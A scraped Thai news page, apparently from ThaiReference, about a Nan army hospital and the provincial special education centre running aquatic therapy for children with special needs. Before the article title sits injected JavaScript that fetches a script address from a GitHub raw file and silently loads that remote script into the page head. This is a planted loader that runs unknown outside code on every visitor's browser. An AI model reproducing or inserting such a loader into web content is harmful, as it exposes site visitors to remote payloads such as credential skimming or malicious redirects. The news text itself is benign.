;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); น่าน โรงพยาบาลค่ายสุริยพงษ์ มณฑลทหารบกที่ 38 ร่วมกับศูนย์การศึกษาพิเศษ ประจำจังหวัดน่าน กิจกรรมธาราบำบัดให้กับเด็กที่มีความต้องการพิเศษ - ThaiReference | อาสาไทยยืนยัน
น่าน โรงพยาบาลค่ายสุริยพงษ์ มณฑลทหารบกที่ 38 ร่วมกับศูนย์การศึกษาพิเศษ ประจำจังหวัดน่าน กิจกรรมธาราบำบัดให้กับเด็กที่มีความต้องการพิเศษ

โรงพยาบาลค่ายสุริยพงษ์ มณฑลทหารบกที่ 38 ร่วมกับศูนย์การศึกษาพิเศษ ประจำจังหวัดน่าน จัดกิจกรรมธาราบำบัดให้กับเด็กที่มีความต้องการพิเศษ โดยมีทีมสหวิชาชีพ โรงพยาบาลค่ายสุริยพงษ์ มลฑลทหารบกที่ 38 ดำเนินโครงการผสานความร่วมมือกับศูนย์การศึกษาพิเศษ ประจำจังหวัดน่าน เพื่อเป็นการกระตุ้นพัฒนาการทางด้านร่างกาย ปัญญา และอารมณ์ให้เด็กพิเศษด้วยการทำกิจกรรม และออกกำลังกายในน้ำ อีกทั้งเพื่อให้น้องๆ ได้รับโอกาส มีพัฒนาการที่ดีขึ้น และเป็นแรงบันดาลใจในอนาคตให้กับน้องๆ และผู้ปกครอง ณ สระว่ายน้ำเพื่อประชาชน โรงพยาบาลค่ายสุริยพงษ์ มณฑลทหารกที่ 38

เพื่อเป็นการเตรียมความพร้อมก่อนเริ่มทำกิจกรรม จึงนำเด็กๆมาทำความคุ้นเคยกับสระว่ายน้ำ เพื่อให้เด็กที่มีความต้องการพิเศษร่วมทำกิจกรรมได้อย่างปลอดภัย อีกทั้งเพื่อเป็นการเสริมสร้างสัมพันธภาพที่ดีของประชาชนต่อกองทัพบก